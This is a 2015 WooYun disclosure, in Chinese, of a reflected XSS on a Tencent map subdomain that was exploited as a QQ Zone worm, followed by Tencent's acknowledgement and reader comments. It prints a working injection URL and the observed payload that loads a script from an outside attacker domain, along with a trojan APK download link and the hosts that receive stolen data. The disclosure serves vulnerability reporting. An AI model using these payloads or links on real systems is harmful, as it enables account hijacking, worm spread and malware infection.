当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136116

漏洞标题:腾讯某分站反射xss导致的空间蠕虫(涉及用漏洞窃取信息)

相关厂商:腾讯

漏洞作者: Burn Egg

提交时间:2015-08-22 20:06

修复时间:2015-10-08 10:58

公开时间:2015-10-08 10:58

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:4

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-22: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

在空间看到有同学说不知道怎么回事就转了说说,感觉眼前一亮!
和@scanf一起搞的,,
明天就要上学了,暑假一共4,50张卷子只做了两张,然而我却静静地在wooyun写报告

详细说明:

http://rtb.map.qq.com/rtbus?qt=comps&cb=1%3C/scrIpt%3E%3CscrIpt%3Ealert(document.domain)&vid=15


qq1.png


这种说说,一看就问题啊= =
点进去发现就自动加了别人为好友,把url复制出来,然而电脑上触发不了。用手机上代理,burp抓包,发现

qq2.png


往上翻一翻

http://rtb.map.qq.com//rtbus?qt=comps&cb=1<%2FscrIpt><scrIpt>document.write("<scr"%2B"ipt%20src%3D%5C"http%3A%2F"%2B"%2Flhcx2010.cn%2Fv%2F20150528.jpg%5C"><%5C%2Fscr"%2B"ipt>")&vid=15


调用xss的页面是

http://cmveedru.lhcx2010.cn/video/1653840220.html?vid=15&med=new&r=0.4373034


接下来scanf简单看了下网站,
发现安卓木马

http://www.gengxin.com.860ys.com/down/2015813/sxkb145.apk


下面都是scanf搞的:
分析一下发现了支付,发送短信等功能,代码里有支付key
找到各种接受信息的网站

tmzhixin.com
112.126.69.51
yoedge.com

漏洞证明:

如上

修复方案:

,,,

版权声明:转载请注明来源 Burn Egg@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-24 10:57

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-24 11:17 | sOnsec ( 实习白帽子 | Rank:98 漏洞数:25 | 安全是什么...)

    前排

  2. 2015-08-24 11:26 | 随风的风 ( 普通白帽子 | Rank:129 漏洞数:48 | [code]心若没有栖息的地方,走到哪里都是在...)

    目测是前端输出的时候,没有做好,腾讯被爆几个这样的洞了,不知道是那个实习生干的。

  3. 2015-08-24 11:33 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    前几天空间全是这个

  4. 2015-08-24 11:56 | ( 路人 | Rank:17 漏洞数:4 | -->‮)

    嗯,明天就要上学了

  5. 2015-08-24 12:18 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    目测视频那个站!

  6. 2015-08-24 12:33 | scanf ( 核心白帽子 | Rank:1267 漏洞数:190 | 。)

    然而然并卵.

  7. 2015-08-24 15:53 | chainhelen ( 路人 | Rank:2 漏洞数:1 | OUC vimer linuxer)

    应该是腾讯地图。。

  8. 2015-08-24 17:09 | Vern ( 普通白帽子 | Rank:525 漏洞数:79 | Keep It Simple, Stupid)

    应该是腾讯视频的问题

  9. 2015-08-24 17:14 | scanf ( 核心白帽子 | Rank:1267 漏洞数:190 | 。)

    腾讯地图xss...

  10. 2015-08-24 18:45 | My.Dream ( 普通白帽子 | Rank:113 漏洞数:25 | 大神别打我)

    我猜是地图。。好多xss

  11. 2015-08-24 21:12 | 暮偶 ( 路人 | Rank:5 漏洞数:2 | 代码写的好累.)

    腾讯最近是怎么了?

  12. 2015-08-24 21:35 | 雷少 ( 实习白帽子 | Rank:73 漏洞数:31 | 热爱网络的爱好者,需求同道中人。)

    http://www.freebuf.com/vuls/75711.html 看日期不解释lz=机智

  13. 2015-09-23 14:14 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    我估计应该没有人会手贱地下载下来并且安装吧。。。

  14. 2015-09-23 14:16 | Bird ( 实习白帽子 | Rank:60 漏洞数:25 | Stay hungry. Stay foolish.)

    而且 用CN域名去做这个是不是做大死。